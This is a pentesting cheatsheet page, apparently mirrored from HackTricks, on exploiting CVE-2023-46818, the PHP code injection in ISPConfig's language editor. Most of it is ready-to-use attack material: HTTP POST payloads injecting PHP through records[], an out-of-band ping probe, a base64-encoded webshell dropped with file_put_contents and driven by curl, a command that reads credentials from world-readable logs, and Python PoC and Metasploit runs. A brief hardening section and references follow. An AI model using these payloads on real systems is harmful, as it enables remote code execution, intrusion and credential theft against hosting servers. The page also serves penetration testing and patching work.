daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ispconfig.md (6680B)


      1 ---
      2 title: "ISPConfig"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/ispconfig.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/ispconfig.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # ISPConfig
     14 
     15 ## Overview
     16 
     17 ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
     18 
     19 Common paths in the documented installation and lab setup include:<sup>[[4]](#references)</sup>
     20 - Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
     21 - Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
     22 
     23 Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:
     24 
     25 ```bash
     26 ssh -L 9001:127.0.0.1:8080 user@target
     27 # then browse http://127.0.0.1:9001
     28 ```
     29 
     30 ## Language editor PHP code injection (CVE-2023-46818)
     31 
     32 - Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
     33 - Preconditions:
     34   - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
     35   - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
     36 - Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context
     37 
     38 References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
     39 
     40 ### Manual exploitation flow
     41 
     42 1) Open/create a language file to obtain CSRF tokens
     43 
     44 Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.<sup>[[4]](#references)</sup>
     45 
     46 2) Inject PHP via records[] and save
     47 
     48 Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:<sup>[[4]](#references)</sup>
     49 
     50 ```http
     51 POST /admin/language_edit.php HTTP/1.1
     52 Host: 127.0.0.1:9001
     53 Content-Type: application/x-www-form-urlencoded
     54 Cookie: ispconfig_auth=...
     55 
     56 lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
     57 ```
     58 
     59 Out-of-band test (observe ICMP):<sup>[[4]](#references)</sup>
     60 
     61 ```http
     62 records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
     63 ```
     64 
     65 3) Write files and drop a webshell
     66 
     67 Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):<sup>[[4]](#references)</sup>
     68 
     69 ```http
     70 records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
     71 ```
     72 
     73 Then write a simple webshell using base64 to avoid bad characters in the POST body:<sup>[[4]](#references)</sup>
     74 
     75 ```http
     76 records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
     77 ```
     78 
     79 Use it:
     80 
     81 ```bash
     82 curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
     83 ```
     84 
     85 If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.<sup>[[4]](#references)</sup>
     86 
     87 ### 2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
     88 
     89 The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in **3.3.0p2**. Preconditions are unchanged (`admin_allow_langedit` and admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.<sup>[[5]](#references)</sup>
     90 
     91 **Notes:**
     92 - On 3.3.0/3.3.0p1, world-readable rotated logs under `/usr/local/ispconfig/interface/log/` may leak credentials if debug logging was enabled:<sup>[[5]](#references)</sup>
     93 
     94 ```bash
     95 find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
     96 ```
     97 - Exploit steps match CVE-2023-46818; 3.3.0p2 adds extra checks before language editing.<sup>[[5]](#references)</sup>
     98 
     99 ### Python PoC
    100 
    101 A ready-to-use exploit automates token handling and payload delivery:<sup>[[3]](#references)</sup>
    102 - [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)<sup>[[3]](#references)</sup>
    103 
    104 Example run:
    105 
    106 ```bash
    107 python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
    108 ```
    109 
    110 ### Metasploit module (released July 2025)
    111 
    112 Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`. It checks `admin_allow_langedit` and attempts to enable it when disabled, which requires administrator credentials with system-configuration access.<sup>[[6]](#references)</sup>
    113 
    114 ```text
    115 use exploit/linux/http/ispconfig_lang_edit_php_code_injection
    116 set RHOSTS 10.10.10.50
    117 set RPORT 8080
    118 set USERNAME admin
    119 set PASSWORD <admin_pass>
    120 set TARGETURI /
    121 run
    122 ```
    123 
    124 The module writes a base64-encoded payload through `records[]` and executes it, giving a PHP Meterpreter or custom payload.<sup>[[6]](#references)</sup>
    125 
    126 ### Hardening
    127 
    128 - Upgrade to **3.2.11p1** or later for the original issue, and to **3.3.0p2** or later for the 2025 regression.<sup>[[1]](#references)[[5]](#references)</sup>
    129 - Disable the language editor unless strictly needed:
    130 
    131 ```text
    132 admin_allow_langedit=no
    133 ```
    134 
    135 - Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
    136 - Enforce strong authentication for the built-in `admin` account
    137 
    138 ## References
    139 
    140 - [1] [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
    141 - [2] [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
    142 - [3] [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
    143 - [4] [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
    144 - [5] [ISPConfig 3.3.0p2 Released – Security Update](https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/)
    145 - [6] [Rapid7 Vulnerability Database - ISPConfig `language_edit.php` PHP Code Injection](https://www.rapid7.com/db/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection/)
    146 - [7] [ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability (KIS-2023-13, original advisory by Egidio Romano)](https://karmainsecurity.com/KIS-2023-13)